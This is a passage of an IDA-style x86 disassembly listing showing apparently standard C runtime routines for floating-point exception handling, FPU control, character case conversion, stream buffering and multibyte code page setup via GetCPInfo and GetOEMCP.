; ---------------------------------------------------------------------------
loc_42A323: ; CODE XREF: sub_42A22C+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_42F570
fld dbl_44BD78
fnstsw ax
sahf
ja short loc_42A33B
fchs
loc_42A33B: ; CODE XREF: sub_42A22C+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_42A341: ; CODE XREF: sub_42A22C+A5�j
; sub_42A22C+CD�j ...
fstp qword ptr [ecx]
loc_42A343: ; CODE XREF: sub_42A22C+81�j
and edi, 0FFFFFFFEh
jmp loc_42A421
; ---------------------------------------------------------------------------
loc_42A34B: ; CODE XREF: sub_42A22C+47�j
; sub_42A22C+51�j
test al, 2
jz loc_42A421
test byte ptr [ebp+arg_8], 10h
jz loc_42A421
push esi
xor esi, esi
test al, 10h
jz short loc_42A366
mov esi, ebx
loc_42A366: ; CODE XREF: sub_42A22C+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp dbl_42F570
fnstsw ax
sahf
jz loc_42A40F
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_42A5DA
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_42A3B1
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_42A405
; ---------------------------------------------------------------------------
loc_42A3B1: ; CODE XREF: sub_42A22C+17A�j
fld [ebp+var_C]
fcomp dbl_42F570
fnstsw ax
sahf
jnb short loc_42A3C3
mov edx, ebx
jmp short loc_42A3C5
; ---------------------------------------------------------------------------
loc_42A3C3: ; CODE XREF: sub_42A22C+191�j
xor edx, edx
loc_42A3C5: ; CODE XREF: sub_42A22C+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_42A3F9
sub eax, ecx
loc_42A3DC: ; CODE XREF: sub_42A22C+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_42A3E7
test esi, esi
jnz short loc_42A3E7
mov esi, ebx
loc_42A3E7: ; CODE XREF: sub_42A22C+1B3�j
; sub_42A22C+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_42A3F3
or byte ptr [ebp+var_C+3], 80h
loc_42A3F3: ; CODE XREF: sub_42A22C+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_42A3DC
loc_42A3F9: ; CODE XREF: sub_42A22C+1AC�j
test edx, edx
jz short loc_42A405
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_42A405: ; CODE XREF: sub_42A22C+183�j
; sub_42A22C+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_42A411
; ---------------------------------------------------------------------------
loc_42A40F: ; CODE XREF: sub_42A22C+14E�j
mov esi, ebx
loc_42A411: ; CODE XREF: sub_42A22C+1E1�j
test esi, esi
pop esi
jz short loc_42A41E
push 10h
call sub_42A6DB
pop ecx
loc_42A41E: ; CODE XREF: sub_42A22C+1E8�j
and edi, 0FFFFFFFDh
loc_42A421: ; CODE XREF: sub_42A22C+26�j
; sub_42A22C+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_42A438
test byte ptr [ebp+arg_8], 20h
jz short loc_42A438
push 20h
call sub_42A6DB
pop ecx
and edi, 0FFFFFFEFh
loc_42A438: ; CODE XREF: sub_42A22C+1F9�j
; sub_42A22C+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_42A22C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42A443(int, int, int, int, int, int, double, int)
sub_42A443 proc near ; CODE XREF: sub_429E8D+2B�p
; sub_429EE1+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_42A4F3
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_42A4AE
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_42A6B8
lea eax, [ebp+var_20]
push eax
call sub_41A1C5
add esp, 0Ch
test eax, eax
jnz short loc_42A4A8
push esi
call sub_42A4CB
pop ecx
loc_42A4A8: ; CODE XREF: sub_42A443+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_42A4AE: ; CODE XREF: sub_42A443+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_42A6B8
push [ebp+arg_0]
call sub_42A4CB
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_42A443 endp
; =============== S U B R O U T I N E =======================================
sub_42A4CB proc near ; CODE XREF: sub_429EE1+7D�p
; sub_42A443+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_42A4E7
jle short locret_42A4F2
cmp eax, 3
jg short locret_42A4F2
call sub_426528
mov dword ptr [eax], 22h
retn
; ---------------------------------------------------------------------------
loc_42A4E7: ; CODE XREF: sub_42A4CB+7�j
call sub_426528
mov dword ptr [eax], 21h
locret_42A4F2: ; CODE XREF: sub_42A4CB+9�j
; sub_42A4CB+E�j
retn
sub_42A4CB endp
; =============== S U B R O U T I N E =======================================
sub_42A4F3 proc near ; CODE XREF: sub_42A443+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_44BCA0
loc_42A4FA: ; CODE XREF: sub_42A4F3+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_42A510
add eax, 8
inc ecx
cmp eax, offset dbl_44BD78
jl short loc_42A4FA
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42A510: ; CODE XREF: sub_42A4F3+D�j
mov eax, off_44BCA4[ecx*8]
retn
sub_42A4F3 endp
; =============== S U B R O U T I N E =======================================
sub_42A518 proc near ; CODE XREF: sub_429EE1+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_42A524
push 5
jmp short loc_42A53A
; ---------------------------------------------------------------------------
loc_42A524: ; CODE XREF: sub_42A518+6�j
test al, 8
jz short loc_42A52C
push 1
jmp short loc_42A53A
; ---------------------------------------------------------------------------
loc_42A52C: ; CODE XREF: sub_42A518+E�j
test al, 4
jz short loc_42A534
push 2
jmp short loc_42A53A
; ---------------------------------------------------------------------------
loc_42A534: ; CODE XREF: sub_42A518+16�j
test al, 1
jz short loc_42A53C
push 3
loc_42A53A: ; CODE XREF: sub_42A518+A�j
; sub_42A518+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_42A53C: ; CODE XREF: sub_42A518+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_42A518 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42A545(double)
sub_42A545 proc near ; CODE XREF: sub_4242B0:loc_424336�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_42A545 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42A557(double, int)
sub_42A557 proc near ; CODE XREF: sub_42A5DA+82�p
; sub_42A5DA+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_42A557 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A580 proc near ; CODE XREF: sub_4242B0+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_42A597
cmp [ebp+arg_0], edx
jnz short loc_42A5A9
push 1
jmp short loc_42A5D3
; ---------------------------------------------------------------------------
loc_42A597: ; CODE XREF: sub_42A580+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_42A5A9
cmp [ebp+arg_0], edx
jnz short loc_42A5A9
push 2
jmp short loc_42A5D3
; ---------------------------------------------------------------------------
loc_42A5A9: ; CODE XREF: sub_42A580+11�j
; sub_42A580+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_42A5BC
push 3
jmp short loc_42A5D3
; ---------------------------------------------------------------------------
loc_42A5BC: ; CODE XREF: sub_42A580+36�j
cmp cx, 7FF0h
jnz short loc_42A5D6
test [ebp+arg_4], 7FFFFh
jnz short loc_42A5D1
cmp [ebp+arg_0], edx
jz short loc_42A5D6
loc_42A5D1: ; CODE XREF: sub_42A580+4A�j
push 4
loc_42A5D3: ; CODE XREF: sub_42A580+15�j
; sub_42A580+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42A5D6: ; CODE XREF: sub_42A580+41�j
; sub_42A580+4F�j
xor eax, eax
pop ebp
retn
sub_42A580 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42A5DA(double, int)
sub_42A5DA proc near ; CODE XREF: sub_42A22C+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp dbl_42F570
push esi
fnstsw ax
sahf
jnz short loc_42A5FA
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_42A690
; ---------------------------------------------------------------------------
loc_42A5FA: ; CODE XREF: sub_42A5DA+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_42A669
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_42A612
cmp dword ptr [ebp+arg_0], ecx
jz short loc_42A669
loc_42A612: ; CODE XREF: sub_42A5DA+31�j
fld [ebp+arg_0]
fcomp dbl_42F570
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_42A62A
push 1
pop eax
jmp short loc_42A62C
; ---------------------------------------------------------------------------
loc_42A62A: ; CODE XREF: sub_42A5DA+49�j
xor eax, eax
loc_42A62C: ; CODE XREF: sub_42A5DA+4E�j
; sub_42A5DA+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_42A645
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_42A63F
or dword ptr [ebp+arg_0+4], 1
loc_42A63F: ; CODE XREF: sub_42A5DA+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_42A62C
; ---------------------------------------------------------------------------
loc_42A645: ; CODE XREF: sub_42A5DA+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_42A653
or byte ptr [ebp+arg_0+7], 80h
loc_42A653: ; CODE XREF: sub_42A5DA+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_42A557
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_42A690
; ---------------------------------------------------------------------------
loc_42A669: ; CODE XREF: sub_42A5DA+28�j
; sub_42A5DA+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_42A557
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_42A690: ; CODE XREF: sub_42A5DA+1B�j
; sub_42A5DA+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_42A5DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A69B proc near ; CODE XREF: sub_429F79+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_42A69B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A6A9 proc near ; CODE XREF: sub_429F79+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_42A6A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A6B8 proc near ; CODE XREF: sub_4242B0+13�p
; sub_4242B0+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_42A6B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A6DB proc near ; CODE XREF: sub_42A22C+1D�p
; sub_42A22C+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_42A6F2
fld tbyte_44BDA0
fistp [ebp+arg_0]
wait
loc_42A6F2: ; CODE XREF: sub_42A6DB+B�j
test cl, 8
jz short loc_42A707
fstsw ax
fld tbyte_44BDA0
fstp [ebp+var_8]
wait
fstsw ax
loc_42A707: ; CODE XREF: sub_42A6DB+1A�j
test cl, 10h
jz short loc_42A716
fld tbyte_44BDAC
fstp [ebp+var_8]
wait
loc_42A716: ; CODE XREF: sub_42A6DB+2F�j
test cl, 4
jz short loc_42A724
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_42A724: ; CODE XREF: sub_42A6DB+3E�j
test cl, 20h
jz short locret_42A72F
fldpi
fstp [ebp+var_8]
wait
locret_42A72F: ; CODE XREF: sub_42A6DB+4C�j
leave
retn
sub_42A6DB endp
; =============== S U B R O U T I N E =======================================
sub_42A731 proc near ; CODE XREF: sub_428A62+9�p
arg_0 = dword ptr 4
push ebx
xor ebx, ebx
cmp dword_6314C8, ebx
jnz short loc_42A74F
mov eax, [esp+4+arg_0]
cmp eax, 41h
jl short loc_42A79E
cmp eax, 5Ah
jg short loc_42A79E
add eax, 20h
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42A74F: ; CODE XREF: sub_42A731+9�j
push esi
mov esi, offset dword_63198C
push edi
push esi
call dword_42F200 ; InterlockedIncrement
cmp dword_631988, ebx
mov edi, dword_42F1FC
jz short loc_42A779
push esi
call edi ; dword_42F1FC
push 13h
call sub_428436
pop ecx
push 1
pop ebx
loc_42A779: ; CODE XREF: sub_42A731+38�j
push [esp+0Ch+arg_0]
call sub_42A7A0
test ebx, ebx
pop ecx
mov [esp+0Ch+arg_0], eax
jz short loc_42A795
push 13h
call sub_428497
pop ecx
jmp short loc_42A798
; ---------------------------------------------------------------------------
loc_42A795: ; CODE XREF: sub_42A731+58�j
push esi
call edi ; dword_42F1FC
loc_42A798: ; CODE XREF: sub_42A731+62�j
mov eax, [esp+0Ch+arg_0]
pop edi
pop esi
loc_42A79E: ; CODE XREF: sub_42A731+12�j
; sub_42A731+17�j
pop ebx
retn
sub_42A731 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A7A0 proc near ; CODE XREF: sub_424380+94�p
; sub_424380+9E�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_6314C8, 0
push ebx
push esi
push edi
jnz short loc_42A7CD
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_42A866
cmp eax, 5Ah
jg loc_42A866
add eax, 20h
jmp loc_42A866
; ---------------------------------------------------------------------------
loc_42A7CD: ; CODE XREF: sub_42A7A0+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_42A801
cmp dword_449A44, esi
jle short loc_42A7EF
push esi
push ebx
call sub_42653A
pop ecx
pop ecx
jmp short loc_42A7F9
; ---------------------------------------------------------------------------
loc_42A7EF: ; CODE XREF: sub_42A7A0+42�j
mov eax, off_449838
mov al, [eax+ebx*2]
and eax, esi
loc_42A7F9: ; CODE XREF: sub_42A7A0+4D�j
test eax, eax
jnz short loc_42A801
loc_42A7FD: ; CODE XREF: sub_42A7A0+AD�j
mov eax, ebx
jmp short loc_42A866
; ---------------------------------------------------------------------------
loc_42A801: ; CODE XREF: sub_42A7A0+3A�j
; sub_42A7A0+5B�j
mov edx, off_449838
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_42A825
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_42A82E
; ---------------------------------------------------------------------------
loc_42A825: ; CODE XREF: sub_42A7A0+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_42A82E: ; CODE XREF: sub_42A7A0+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push dword_6314C8
call sub_429BA7
add esp, 20h
test eax, eax
jz short loc_42A7FD
cmp eax, esi
jnz short loc_42A859
movzx eax, [ebp+var_4]
jmp short loc_42A866
; ---------------------------------------------------------------------------
loc_42A859: ; CODE XREF: sub_42A7A0+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_42A866: ; CODE XREF: sub_42A7A0+16�j
; sub_42A7A0+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42A7A0 endp
; =============== S U B R O U T I N E =======================================
sub_42A86B proc near ; CODE XREF: sub_424496+11�p
; sub_424744+E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_42B835
test eax, eax
pop ecx
jz short loc_42A8F4
cmp esi, offset dword_449450
jnz short loc_42A889
xor eax, eax
jmp short loc_42A894
; ---------------------------------------------------------------------------
loc_42A889: ; CODE XREF: sub_42A86B+18�j
cmp esi, offset dword_449470
jnz short loc_42A8F4
push 1
pop eax
loc_42A894: ; CODE XREF: sub_42A86B+1C�j
inc dword_6313E8
test word ptr [esi+0Ch], 10Ch
jnz short loc_42A8F4
cmp dword_6314E0[eax*4], 0
push ebx
push edi
lea edi, ds:6314E0h[eax*4]
mov ebx, 1000h
jnz short loc_42A8DA
push ebx
call sub_422F79
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_42A8DA
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_42A8E7
; ---------------------------------------------------------------------------
loc_42A8DA: ; CODE XREF: sub_42A86B+4D�j
; sub_42A86B+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_42A8E7: ; CODE XREF: sub_42A86B+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_42A8F4: ; CODE XREF: sub_42A86B+10�j
; sub_42A86B+24�j ...
xor eax, eax
pop esi
retn
sub_42A86B endp
; =============== S U B R O U T I N E =======================================
sub_42A8F8 proc near ; CODE XREF: sub_424496+2B�p
; sub_424744+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_42A920
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_42A920
push esi
call sub_42671D
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
loc_42A920: ; CODE XREF: sub_42A8F8+6�j
; sub_42A8F8+10�j
pop esi
retn
sub_42A8F8 endp
; =============== S U B R O U T I N E =======================================
sub_42A922 proc near ; CODE XREF: sub_42A953+4�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_42483C
dec dword ptr [esi+4]
pop ecx
js short loc_42A93E
mov eax, [esi]
movzx edi, byte ptr [eax]
inc eax
mov [esi], eax
jmp short loc_42A947
; ---------------------------------------------------------------------------
loc_42A93E: ; CODE XREF: sub_42A922+10�j
push esi
call sub_426826
pop ecx
mov edi, eax
loc_42A947: ; CODE XREF: sub_42A922+1A�j
push esi
call sub_42488E
pop ecx
mov eax, edi
pop edi
pop esi
retn
sub_42A922 endp
; =============== S U B R O U T I N E =======================================
sub_42A953 proc near ; CODE XREF: sub_4245EC+5�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_42A922
pop ecx
retn
sub_42A953 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A95E proc near ; CODE XREF: sub_42AD36+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push 19h
call sub_428436
push [ebp+arg_0]
call sub_42AB0B ; GetOEMCP
mov ebx, eax
pop ecx
cmp ebx, dword_631768
pop ecx
mov [ebp+arg_0], ebx
jnz short loc_42A98C
loc_42A985: ; CODE XREF: sub_42A95E+196�j
xor esi, esi
jmp loc_42AAFC
; ---------------------------------------------------------------------------
loc_42A98C: ; CODE XREF: sub_42A95E+25�j
test ebx, ebx
jz loc_42AAEA
xor edx, edx
mov eax, offset dword_44BDC0
loc_42A99B: ; CODE XREF: sub_42A95E+4A�j
cmp [eax], ebx
jz short loc_42AA13
add eax, 30h
inc edx
cmp eax, offset dword_44BEB0
jl short loc_42A99B
lea eax, [ebp+var_18]
push eax
push ebx
call dword_42F19C ; GetCPInfo
push 1
pop esi
cmp eax, esi
jnz loc_42AAE1
push 40h
and dword_631984, 0
pop ecx
xor eax, eax
mov edi, offset byte_631880
cmp [ebp+var_18], esi
rep stosd
stosb
mov dword_631768, ebx
jbe loc_42AACE
cmp [ebp+var_12], 0
jz loc_42AAA9
lea ecx, [ebp+var_11]
loc_42A9F0: ; CODE XREF: sub_42A95E+145�j
mov dl, [ecx]
test dl, dl
jz loc_42AAA9
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_42AA01: ; CODE XREF: sub_42A95E+B3�j
cmp eax, edx
ja loc_42AA9D
or byte_631881[eax], 4
inc eax
jmp short loc_42AA01
; ---------------------------------------------------------------------------
loc_42AA13: ; CODE XREF: sub_42A95E+3F�j
and [ebp+var_4], 0
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_631880
lea esi, [edx+edx*2]
rep stosd
shl esi, 4
stosb
lea ebx, dword_44BDD0[esi]
loc_42AA30: ; CODE XREF: sub_42A95E+10F�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_42AA63
loc_42AA37: ; CODE XREF: sub_42A95E+103�j
mov dl, [ecx+1]
test dl, dl
jz short loc_42AA63
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_42AA5C
mov edx, [ebp+var_4]
mov dl, byte_44BDB8[edx]
loc_42AA51: ; CODE XREF: sub_42A95E+FC�j
or byte_631881[eax], dl
inc eax
cmp eax, edi
jbe short loc_42AA51
loc_42AA5C: ; CODE XREF: sub_42A95E+E8�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_42AA37
loc_42AA63: ; CODE XREF: sub_42A95E+D7�j
; sub_42A95E+DE�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_42AA30
mov eax, [ebp+arg_0]
mov dword_63177C, 1
push eax
mov dword_631768, eax
call sub_42AB55
lea esi, dword_44BDC4[esi]
mov edi, offset dword_631770
movsd
movsd
pop ecx
mov dword_631984, eax
movsd
jmp short loc_42AAEF
; ---------------------------------------------------------------------------
loc_42AA9D: ; CODE XREF: sub_42A95E+A5�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_42A9F0
loc_42AAA9: ; CODE XREF: sub_42A95E+89�j
; sub_42A95E+96�j
mov eax, esi
loc_42AAAB: ; CODE XREF: sub_42A95E+15A�j
or byte_631881[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_42AAAB
push ebx
call sub_42AB55
pop ecx
mov dword_631984, eax
mov dword_63177C, esi
jmp short loc_42AAD5
; ---------------------------------------------------------------------------
loc_42AACE: ; CODE XREF: sub_42A95E+7F�j
and dword_63177C, 0
loc_42AAD5: ; CODE XREF: sub_42A95E+16E�j
xor eax, eax
mov edi, offset dword_631770
stosd
stosd
stosd
jmp short loc_42AAEF
; ---------------------------------------------------------------------------
loc_42AAE1: ; CODE XREF: sub_42A95E+5C�j
cmp dword_6314E8, 0
jz short loc_42AAF9
loc_42AAEA: ; CODE XREF: sub_42A95E+30�j
call sub_42AB88
loc_42AAEF: ; CODE XREF: sub_42A95E+13D�j
; sub_42A95E+181�j
call sub_42ABB1
jmp loc_42A985
; ---------------------------------------------------------------------------
loc_42AAF9: ; CODE XREF: sub_42A95E+18A�j
or esi, 0FFFFFFFFh
loc_42AAFC: ; CODE XREF: sub_42A95E+29�j
push 19h
call sub_428497
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_42A95E endp
; =============== S U B R O U T I N E =======================================
sub_42AB0B proc near ; CODE XREF: sub_42A95E+13�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_6314E8, 0
cmp eax, 0FFFFFFFEh
jnz short loc_42AB2B
mov dword_6314E8, 1
jmp dword_42F194
; ---------------------------------------------------------------------------
loc_42AB2B: ; CODE XREF: sub_42AB0B+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_42AB40
mov dword_6314E8, 1
jmp dword_42F198
; ---------------------------------------------------------------------------
loc_42AB40: ; CODE XREF: sub_42AB0B+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_42AB54
mov eax, dword_6314D8
mov dword_6314E8, 1
locret_42AB54: ; CODE XREF: sub_42AB0B+38�j
retn
sub_42AB0B endp
; =============== S U B R O U T I N E =======================================
sub_42AB55 proc near ; CODE XREF: sub_42A95E+124�p
; sub_42A95E+15D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_42AB82
sub eax, 4
jz short loc_42AB7C
sub eax, 0Dh
jz short loc_42AB76
dec eax
jz short loc_42AB70
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42AB70: ; CODE XREF: sub_42AB55+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_42AB76: ; CODE XREF: sub_42AB55+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_42AB7C: ; CODE XREF: sub_42AB55+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_42AB82: ; CODE XREF: sub_42AB55+9�j
mov eax, 411h
retn
sub_42AB55 endp
; =============== S U B R O U T I N E =======================================
sub_42AB88 proc near ; CODE XREF: sub_42A95E:loc_42AAEA�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_631880
rep stosd
stosb
xor eax, eax
mov edi, offset dword_631770
mov dword_631768, eax
mov dword_63177C, eax
mov dword_631984, eax
stosd
stosd
stosd
pop edi
retn
sub_42AB88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42ABB1 proc near ; CODE XREF: sub_42A95E:loc_42AAEF�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_631768
call dword_42F19C ; GetCPInfo
cmp eax, 1
jnz loc_42ACEA
xor eax, eax
mov esi, 100h
loc_42ABDB: ; CODE XREF: sub_42ABB1+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_42ABDB
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_42AC2C
push ebx
push edi
lea edx, [ebp+var_D]
loc_42ABFA: ; CODE XREF: sub_42ABB1+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_42AC21
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
